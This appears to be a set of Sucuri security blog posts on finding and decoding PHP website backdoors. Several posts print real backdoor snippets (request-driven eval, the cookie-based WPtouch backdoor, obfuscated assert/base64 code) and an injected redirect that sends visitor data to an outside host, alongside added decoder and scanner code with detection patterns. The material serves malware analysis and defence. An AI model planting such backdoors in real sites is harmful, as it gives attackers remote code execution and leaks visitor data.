Sucuri – Decoding Obfuscated PHP

We are happy to release a new tool for you Do It Yourself (DIY) types. Every now and then you might come across a variety of obfuscated injections in your PHP files and might find yourself wondering,

Wonder what that does?

Not to fear, Sucuri is here and we have a cool little tool that will help you take a look up its skirt. If nothing else, this will help you developers better understand how good is used for evil.

The one very cool thing about it is that it will decode as many layers as possible until it reaches a layer it is unable to decode. In our testing we have found a few strains that went down 20 different layers of obfuscation before reaching a point where human intervention was needed. Here is an example of 13 layers with a final output: http://ddecode.com/phpdecoder/?results=54a91431e44ab48462d4db6a59ae3db8

You can decode your obfuscated PHP here: http://ddecode.com/phpdecoder/
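To show what "peeling layers until one cannot be decoded" means in practice, here is an added example (not the ddecode.com tool itself) that undoes eval()-wrapped base64_decode, gzinflate, str_rot13 and strrev layers; the three-layer sample it builds is constructed for the demonstration.

```python
import base64, codecs, re, zlib

# Added example, not the ddecode.com tool: peel eval()-wrapped obfuscation
# layers (base64_decode, gzinflate, str_rot13, strrev) until the remaining
# code no longer matches a wrapper we know how to undo.

WRAPPER = re.compile(
    r"""^\s*(?:<\?php\s*)?(?:@?eval\s*\()?\s*"""                       # optional <?php and eval(
    r"""((?:(?:base64_decode|gzinflate|str_rot13|strrev)\s*\()+)"""     # chain of decoder calls
    r"""\s*(?P<q>['"])(?P<payload>.*?)(?P=q)\s*\)+\s*;?\s*(?:\?>)?\s*$""",  # quoted payload
    re.DOTALL)

def decode_layer(code):
    """Undo one wrapper layer; return the inner PHP, or None if no known wrapper matches."""
    m = WRAPPER.match(code)
    if not m:
        return None
    funcs = re.findall(r"[a-z0-9_]+", m.group(1))
    data = m.group("payload").encode("latin-1")
    for fn in reversed(funcs):          # outermost call is listed first, so apply innermost first
        if fn == "base64_decode":
            data = base64.b64decode(data)
        elif fn == "gzinflate":
            data = zlib.decompress(data, -zlib.MAX_WBITS)   # raw DEFLATE, as PHP's gzinflate()
        elif fn == "str_rot13":
            data = codecs.encode(data.decode("latin-1"), "rot_13").encode("latin-1")
        elif fn == "strrev":
            data = data[::-1]
    return data.decode("latin-1")

def peel(code, max_layers=50):
    """Decode until no known wrapper is left; return (final_code, layers_removed)."""
    layers = 0
    while layers < max_layers:
        inner = decode_layer(code)
        if inner is None:
            break
        code, layers = inner, layers + 1
    return code, layers

def build_sample():
    """Constructed 3-layer sample: gzinflate(base64_decode()) -> str_rot13() -> base64_decode()."""
    inner = "if (isset($_REQUEST['asc'])) eval(stripslashes($_REQUEST['asc']));"
    l1 = "eval(base64_decode('%s'));" % base64.b64encode(inner.encode()).decode()
    l2 = 'eval(str_rot13("%s"));' % codecs.encode(l1, "rot_13")
    deflate = zlib.compressobj(wbits=-zlib.MAX_WBITS)          # raw DEFLATE stream
    raw = deflate.compress(l2.encode()) + deflate.flush()
    return "<?php eval(gzinflate(base64_decode('%s'))); ?>" % base64.b64encode(raw).decode()
```

Real samples add layers the regex does not know (string-built function names, preg_replace /e, custom decoders), which is exactly where the automated decoding stops and a human takes over.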

Backdoor Tool Kit – Today’s Scary Web Malware Reality

We often talk about the importance of keeping your server clean. You can see it in a number of our articles and presentations, and this post will likely drive that point home.

This past week we came across a nice little package that we felt compelled to share with you. In it, the attacker makes use of a number of tools designed to help them infiltrate your environment. What’s likely most annoying about this kit is that it’s loaded into your environment, and uses your own resources to help hack you. That’s like being punched in the gut and slapped at the same time, not cool.

Read More

GetMama – Conditional malware affecting thousands of sites

We have been tracking an interesting malware that is affecting thousands of compromised sites. We call it GetMama!!

Why conditional? Because instead of just displaying the malicious code to all the visitors of the web site, it connects back to its command and control server to find out what to do. It also sends back to the attackers the IP address, user agent and referrer of the person visiting the compromised site, so the command and control can determine if it should display the malicious content or not.

It also only displays the malicious content once a day per IP address and only to Windows users.

Read More

MyBB web site and downloads compromised

It’s not good when your site gets infected with malware, especially if you’re a provider of software to many. If you are using MyBB (forum software), please be aware that their web site was hacked and the software download packages were compromised:

There was unfortunately a vulnerability in the CMS which powers the MyBB home page and downloads system. Using this vulnerability a hacker was able to add a backdoor to one of the files, allowing them to execute arbitrary PHP and manipulate the release packages. The CMS was custom written a number of years ago, however we believe a 3rd party framework used by the CMS contributed to the vulnerability. The CMS shares no code with MyBB so there should be no concern that these events indicate a vulnerability in MyBB. The server is also configured to isolate the subdomains belonging to the MyBB website, so it is unlikely that any data from the community forums or other sections of the site was compromised.

The MyBB team recommend these actions:

  1. Download the latest release of MyBB.
  2. Replace ./index.php (in the root folder of your forum) with the one in the download (./Upload/index.php).
  3. Remove the ./install/ folder.

*We are trying to find more information about the backdoor that was added, but no luck yet. If you find a link with the affected version, let us know.

Evil backdoors – Part II

A few months ago we did a post about backdoors, explaining how they work and how to look for them. If you didn’t read it, take a read here:

ASK Sucuri: What about the backdoors?

However, we still see people on online forums recommending a search for “eval ( base64_decode” and things like that when looking for backdoors. If you review the examples in that article, you can see that such a search would miss a few of them.

Today we started to see another type of backdoor that most signature-based tools can’t find. Take a look:

Read More

Malware on /etc/mailquota

We are seeing an interesting trend lately. A site gets compromised and starts to distribute malware to its users. The webmaster (owner of the site) searches everywhere for malicious strings, and can’t find anything. Where can it be hidden?

It could be outside the root directory of your site. On many of the sites we’ve analyzed over the last few days, the attackers added the following code to wp-config.php (yes, WordPress sites on shared hosts):

require( ABSPATH . "/../etc/mailquota");


Read More

Website Getting Redirected? It Might Have Something To Do With Moneygram-tracking Dot Com

Have you ever tried to visit your site and you got redirected to a different site? Maybe some external news page that had nothing to do with your site? Then have you tried to visit it again to test and it worked properly?

Over the last few days we’ve been getting this question often, and it means that your site has been hacked and compromised. Basically, the attackers added code similar to this to your site:

$url = "http://moneygram-tracking.com/cabl/ws/12/request.php?ip=".$_SERVER['REMOTE_ADDR']."&useragent=".urlencode($_SERVER['HTTP_USER_AGENT'])."&referer=".urlencode($_SERVER["HTTP_REFERER"]);
$answer = file_get_contents($url);
if (strpos($answer,"noredirect") === false) {
    echo $answer;
}


Read More

ASK Sucuri: What about the backdoors?

If you have any questions about malware, blacklisting, or security in general, send them to us at contact@sucuri.net and we will answer here. For all the “Ask Sucuri” answers, go here.

Question: What about the backdoors? Why are they so hard to find? How do you guys find them?

When a site gets compromised, one thing we know for sure is that the attackers will leave some piece of malware in there to allow them access back to the site. We call this type of malware backdoors.

Backdoors are very hard to find because they don’t have to be linked anywhere in the site, they can be very small and be easily confused with “normal” code. Some of them have passwords, some are heavily encrypted/encoded and can be anywhere in your site.

On most online forums, people tell you to search for “eval (base64_decode” and things like that to identify hidden backdoors, but that is unlikely to find everything (and your site will just get reinfected).

For example, in the latest osCommerce compromises, all the sites had the following code added to the application_top.php file:

if (isset($_REQUEST['asc'])) eval(stripslashes($_REQUEST['asc']));

Yes, that is a backdoor. It allows the attacker to execute any type of code, add files, remove files, etc. When you are analysing thousands of lines of code, it is easy to miss it.

What about this one:

$wp__theme_icon=create_function('',file_get_contents('/path/wp-content/themes/themename/images/void.jpg'));$wp__theme_icon();

What do you think? Yes, another backdoor, but this time the bulk of it is hidden inside an image (void.jpg). See what we mean about them being hard to detect and search for?

Fun Quiz: Find the backdoor?

Since backdoors can be in any type or shape, let’s look at some examples:

The “Filesman” backdoor, big, complex and easy to find:

$auth_pass = "63a9f0ea7bb98050796b649e85481845";
$color = "#df5";
$default_action = "SQL";
$default_charset = "Windows-1251";
$protectionoffer = "ficken";
preg_replace("/.*/e","\x65\x76\x61\x6C\.. hundreds more lines..

Another simple backdoor, executing any code sent in the “php” POST parameter:

eval (base64_decode($_POST["php"]));

A WordPress-based backdoor. This time, the bad content is hidden inside the database (the wp_options table):

return @eval(get_option('blogopt1'));

A messy backdoor we are seeing in the latest timthumb.php attacks. In this case, all the variable names are completely random per case and per file:

function aknhtkmml3($ur5){$dtuq='$u';$pnt='e6';$p5zy='r';$xcl4='e(';$feuh='od';$qjka='dec';$rhi='$u';
$m='as';$xcew=');';$iw='_';$jutx='5=b';$fwiw='4';$zqi='r';$pwrb='5';
eval($rhi.$p5zy.$jutx.$m.$pnt.$fwiw.$iw.$qjka.$feuh.$xcl4.$dtuq.$zqi.$pwrb…
return $ur5;}$sk25='M3JffC1WcjMrVi1fVHVOKDpoTSIoMGJUNzdXLVZyMytWX1R1Tig6a…

Another messy one. Do you know how the code is executed there? preg_replace() with the “e” modifier acts like an eval(): the hex string passed to pack('H*', ...) decodes to @eval(base64_decode(, which is then run against the base64 payload held in $llllllll:

$lllllll='lllllllll';
$llllll="/^.*$/e";
$llllllll='ZnVuY3Rpb24gZnVu3STVFNmxObm1V… LONG LINE of code.. dXBoQmRxemtuRE1SSXJwdjUwd3NWUUhrWmV3dWFKbHUvZzVpc1JKa0M1TWF2RFVMV1cwUG1XKzJF
$lllllllll=pack('H*', '406576616c286261736536345f6465636f646528').'\$llllllll))';
preg_replace($llllll, $lllllllll, $lllllll);

Searching for base64_decode? Well, what happens when the attackers do this:

<?php
$XZKsyG='as';$RqoaUO='e';
$ygDOEJ=$XZKsyG.'s'.$RqoaUO.'r'.'t';                                  // builds "assert"
$joEDdb='b'.$XZKsyG.$RqoaUO.(64).'_'.'d'.$RqoaUO.'c'.'o'.'d'.$RqoaUO;  // builds "base64_decode"
@$ygDOEJ(@$joEDdb('ZXZhbChiYXNlNjRfZGVjb2RlKCJhV1lvYVhOelpY…

And those are just some simple examples…


So, how to find backdoors?

Finding them is very hard, but at Sucuri we were able to come up with some techniques that work very well:

  1. White listing. We know what the good files look like. We have a large checksum set of all the core WordPress, Joomla, osCommerce, Wiki, etc. files. We also have the checksums for the most popular plugins, modules, extensions and themes. Do you know what that gives us? We know right away if any of the core files were modified (or a new one added), and we can safely ignore the good ones.
  2. Black listing. We also have a list with thousands of backdoors (and their variations) that we have been finding in the last few years.
  3. Anomaly checks. When a file is not in our white list (core files) and not in our blacklist, we run our anomaly checks, where all the functions/variables are analysed and manually inspected to see if they form a backdoor. If they do, we update our blacklists to catch them in the future; if not, another file goes to our white list…

So we mix white listing, blacklisting and our own manual analysis to find all the backdoors in a site. If you are trying to clean a compromised site by yourself, we recommend first overwriting all the files you can (core files, plugins, etc.). What is left, you have to analyse manually to make sure it is clean…
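A compact version of the three-step triage above, written as an added example (not Sucuri's own scanner): the file contents, the known-good manifest and the signature list are constructed for the demonstration, and the anomaly heuristics cover the patterns quoted in this post (variable function calls such as $wp__theme_icon() or $matches[1]($matches[2]), create_function, preg_replace with /e, includes reaching outside the document root, pack('H*') strings and long base64 literals).

```python
import hashlib
import re

# Added example, not Sucuri's scanner: whitelist by checksum, then match a
# signature blacklist, then flag anomalies in whatever is left for a human.

BLACKLIST = [  # signatures for backdoors quoted in this post
    re.compile(r"eval\s*\(\s*base64_decode\s*\(\s*\$_(?:POST|GET|REQUEST)"),
    re.compile(r"eval\s*\(\s*stripslashes\s*\(\s*\$_REQUEST"),
    re.compile(r"eval\s*\(\s*get_option\s*\("),
]
ANOMALIES = {  # name -> pattern; a hit means "inspect by hand", not "malware"
    "variable function call": re.compile(r"\$\w+(?:\[[^\]]*\])?\s*\("),
    "create_function": re.compile(r"\bcreate_function\s*\("),
    "preg_replace /e modifier": re.compile(r"preg_replace\s*\(\s*['\"]/.*?/\w*e\w*['\"]"),
    "include outside docroot": re.compile(r"\b(?:include|require)(?:_once)?\b[^;]*\.\./"),
    "hex-packed string": re.compile(r"pack\s*\(\s*['\"]H\*"),
    "long base64 literal": re.compile(r"['\"][A-Za-z0-9+/=]{80,}['\"]"),
}

def sha256(text):
    return hashlib.sha256(text.encode()).hexdigest()

def triage(files, manifest):
    """files: path -> content; manifest: path -> sha256 of the pristine file.
    Returns path -> (status, anomaly_names)."""
    report = {}
    for path, code in files.items():
        if manifest.get(path) == sha256(code):
            report[path] = ("whitelisted", [])      # byte-identical to the known-good copy
        elif any(p.search(code) for p in BLACKLIST):
            report[path] = ("blacklisted", [])      # matches a known backdoor signature
        else:
            hits = [name for name, p in ANOMALIES.items() if p.search(code)]
            report[path] = ("suspicious" if hits else "unknown", hits)
    return report

# Constructed sample site, modelled on the snippets quoted in this post.
PRISTINE_INDEX = "<?php\ndefine('WP_USE_THEMES', true);\nrequire __DIR__ . '/wp-blog-header.php';\n"
MANIFEST = {"index.php": sha256(PRISTINE_INDEX)}
SITE = {
    "index.php": PRISTINE_INDEX,
    "wp-config.php": "<?php\nrequire( ABSPATH . '/../etc/mailquota');\n",
    "application_top.php": "<?php if (isset($_REQUEST['asc'])) eval(stripslashes($_REQUEST['asc']));",
    "themes/x/functions.php": "<?php $i=create_function('',file_get_contents('images/void.jpg'));$i();",
    "plugins/p/p.php": "<?php if (preg_match('#u/(.*)/(.*)/#', $_COOKIE['k'], $m) && $m[1]($m[2])) echo 1;",
    "plugins/q/q.php": "<?php function add($a, $b) { return $a + $b; }\n",
}
```

Files reported as "unknown" are the ones that still need eyes, and anything confirmed clean should be added to the manifest so the next run can skip it.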

What do you think? I would love to hear other ideas to identify backdoors that you guys are using.


Need someone to secure and clean a hacked site? Sign up with us here: http://sucuri.net/signup.

WordPress plugins hacked – Understanding the backdoor

If you haven’t heard about it already, yesterday three popular WordPress plugins (AddThis, WPtouch, and W3 Total Cache) had a malicious backdoor added to them via the plugin repository. That led to WordPress.org resetting all passwords as a precaution. You can read about it here: Passwords Reset. I must note that the WP.org team did an amazing job dealing with this incident and getting it all fixed very fast!

However, what is interesting to us is what the WordPress.org team said:

Earlier today the WordPress team noticed suspicious commits to several popular plugins (AddThis, WPtouch, and W3 Total Cache) containing cleverly disguised backdoors.

Cleverly disguised backdoors? That’s something we wanted to check. We went to their repositories and found this in the WPtouch changelog:

if (preg_match("#useragent/([^/]*)/([^/]*)/#i", $_COOKIE[$key], $matches) && $matches[1]($matches[2]))
    $this->desired_view = $matches[1].$matches[2];

What does this code do?

Someone skimming through the code may not see anything with malicious intent there. However, it checks if a specific cookie is set and, if it is, parses its content into the $matches array. After that, it executes code by calling $matches[1]($matches[2]). That is possible because in PHP a string held in a variable can be called as a function (so $matches[1] is the function name and $matches[2] the argument passed to it).

So someone could set the cookie to eval, or even system/exec, and run any command on the target site as the web server user.

Kudos to the WordPress Core Team

Again, very clever backdoor and I am impressed that the WordPress team caught this in the middle of so many plugins and commits. I wasn’t able to check the other plugins, because it seems that plugins.trac.wordpress.org is down at the moment.

Another thing to highlight, which Matt stated in the news release on WordPress.org, is to make sure you update your plugins. By keeping your software up to date, you have the latest patches and security fixes, which in turn lowers your risk of security issues.

If you are worried your site might have been hacked, try scanning it with Sucuri SiteCheck to see if there is anything wrong.